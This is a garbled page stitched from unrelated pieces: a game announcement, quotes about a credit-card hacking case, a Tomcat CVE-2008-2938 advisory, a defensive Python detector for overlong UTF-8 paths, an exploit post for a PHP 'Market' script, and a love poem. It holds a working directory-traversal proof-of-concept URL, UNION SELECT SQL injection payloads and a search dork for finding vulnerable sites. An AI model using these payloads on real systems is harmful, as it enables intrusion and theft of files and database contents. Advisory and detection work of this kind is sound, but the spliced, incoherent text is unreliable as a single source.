Now available: Ruckingenur II, the latest game in my Games for Engineers series!
In the style of the first Ruckingenur, Ruckingenur II is a game of “rock and roll” reverse engineering of electrical circuits. Unlike the first Ruckingenur, Ruckingenur II is a full game, complete with multiple levels, a soundtrack, and live-action video sequences. Help can be found inside the game. Download link below!
Salcedo says he started getting cold feet when he realized that Lowe's network administrators had detected his presence on their network. He wanted to bail. But he had already lined up a buyer for the credit cards -- a mysterious figure in the computer underground known as SoupNazi, who wouldn't take no for an answer.
Now, "I know for a fact that he was an informant during the time that he was dealing with us," says Salcedo.
"His argument would basically be that ... Gonzalez threatened him as a government agent in order to induce him to plant the sniffer," Rasch says. "He would not have planted the sniffer but for the threat, and his sentence was based on that."
Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8
in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next
releases. Please apply the hot fix until next release.
References:
- http://tomcat.apache.org/security.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
History:
- 07.17.2008: Initial notification (To Apache Security Team)
- 08.02.2008: Responded that this problem was fixed and a new version released
- 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)
- 08.10.2008: Responded with some suggestions.
Description
According to the Apache Security Team, this problem occurs because of the Java side.
If your context.xml or server.xml allows 'allowLinking' and 'URIencoding' as
'UTF-8', an attacker can obtain your important system files (e.g. /etc/passwd).
Exploit
If your webroot directory is three levels deep (e.g. /usr/local/wwwroot), an
attacker can access arbitrary files as below. (Proof-of-concept)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar
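A defender-side check for the encoding used in the proof-of-concept above, as an added example (not part of the advisory or of Tomcat's code): it percent-decodes a request path, decodes the bytes the way a non-validating UTF-8 decoder would, and reports overlong sequences that hide ASCII characters such as '.'. The function names and sample paths are constructed for illustration; the 3-byte overlong case goes beyond the 2-byte form shown in the advisory.

```python
from urllib.parse import unquote_to_bytes

def lenient_decode(raw: bytes):
    """Decode like a non-validating UTF-8 decoder; also return each overlong
    sequence found as (offset, raw_bytes, character_it_hides)."""
    out, findings, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            n, cp, min_cp = 1, b, 0
        elif 0xC0 <= b <= 0xDF:
            n, cp, min_cp = 2, b & 0x1F, 0x80
        elif 0xE0 <= b <= 0xEF:
            n, cp, min_cp = 3, b & 0x0F, 0x800
        elif 0xF0 <= b <= 0xF7:
            n, cp, min_cp = 4, b & 0x07, 0x10000
        else:                       # stray continuation byte or invalid lead
            n, cp, min_cp = 1, 0xFFFD, 0
        tail = raw[i + 1:i + n]
        if len(tail) != n - 1 or any((t & 0xC0) != 0x80 for t in tail):
            out.append("\ufffd")    # truncated or malformed sequence
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp > 0x10FFFF:
            cp = 0xFFFD
        elif cp < min_cp:           # shortest-form rule violated: overlong
            findings.append((i, raw[i:i + n], chr(cp)))
        out.append(chr(cp))
        i += n
    return "".join(out), findings

def inspect_path(request_path: str):
    """Percent-decode a request path and flag traversal hidden by overlongs."""
    decoded, overlong = lenient_decode(unquote_to_bytes(request_path))
    hidden = bool(overlong) and ".." in decoded.split("/")
    return {"decoded": decoded, "overlong": overlong, "hidden_traversal": hidden}

if __name__ == "__main__":
    # Constructed sample request paths (first one uses the advisory's encoding).
    for path in ["/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar",
                 "/docs/caf%c3%a9.html", "/%e0%80%ae%e0%80%ae/x"]:
        r = inspect_path(path)
        print(path, "->", r["decoded"], "| overlong:", len(r["overlong"]),
              "| hidden traversal:", r["hidden_traversal"])
```

Any overlong sequence in a request path is worth rejecting or alerting on, since legitimate clients emit only shortest-form UTF-8.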
Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork:
made by matterdaddy
I miss you since the day where love is much more than kiss and holding hand
It's the day where poet its bitter than symphoni of faith
It's the day where the river sing the rhyme of losing
You are the air that i breath, The song that i sing
The path what im seek, to place my restless hearth
Let me tell the story about the beauty that i can't tell
Let me speak out loud about the love unexplained
It's you and let it be always you who consius me
The one that always inspiring me
How to love and live and to live in love
it's you and always be you ... since the beginning of this poet

